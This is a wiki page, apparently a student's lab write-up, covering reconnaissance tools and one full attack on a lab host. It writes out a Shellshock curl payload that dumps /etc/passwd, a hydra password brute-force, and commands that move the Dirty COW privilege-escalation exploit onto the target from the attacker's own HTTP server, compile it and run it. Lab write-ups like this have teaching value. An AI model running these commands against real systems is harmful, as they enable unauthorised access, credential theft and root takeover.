Exploit Basics - 5huckle/OFFICIALTECHJOURNAL GitHub Wiki
RECON (INFORMATION GATHERING)
Tools at your disposal
- nmap (can scan for a number of things including open ports, alive hosts, services being run, etc (see Host Discovery for more)
- ping (can test permissions and if hosts are alive, as well as show a potential network route)
- internet (look up exploits, troubleshoot, cross reference, etc)
- dirb DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary based attack against a web server and analyzing the responses.
- cewl * Generates wordlists based on websites
Gather Information about your target
This could use the tools listed above, but there are a large number of tools available to use. Nmap is a very versatile program
Make sure to record any and all information found. If a ping is alive, record it. If you do an nmap scan, flush it to a file and keep it. The more information (to an extent) the merrier.
Formatting
nmaptocsv is a good tool for formatting.
nmaptocsv -i file.txt -d ','
Access target system
I used SSH this time. I used nmap to scan for open ports, the only two being 22 and 80 (ssh and http). Using http, I was able to access the target web server and coax it to give me the contents of /etc/passwd using this command
"curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd-' bash -s :'' http://10.0.5.23/cgi-bin/status"
Once I had the user account, I used grep to single out possible passwords from rockyou.txt and flush them into a new file that I passed through hydra in conjunction with the username I found to attempt to find the correct password. After hydra returned a match for the correct password, I used it to log on and it worked.
Elevating to root with no permissions
Once I accessed the target account on the target box, I did not have any permissions or authentication. I could not even use sudo despite knowing the password. My work around was using my home box that I was SSHing from to download an exploit that would allow me to gain root access called dirtycow. Here is how I downloaded it
wget https://raw.githubusercontent.com/firefart/dirtycow/master/dirty.c
I then hosted a python server
python -m http.server 80
And used the target box to access this http.server by using my VPN IP from my home box as the server IP so I could download the exploit
I compiled it on the target box
gcc -pthread dirty.c -o dirty -lcrypt
I gave it execute permissions
chmod +x dirty
Then I ran dirty
./dirty
And I was done. Here is the guide I used https://bond-o.medium.com/dirty-cow-2c79cd6859c9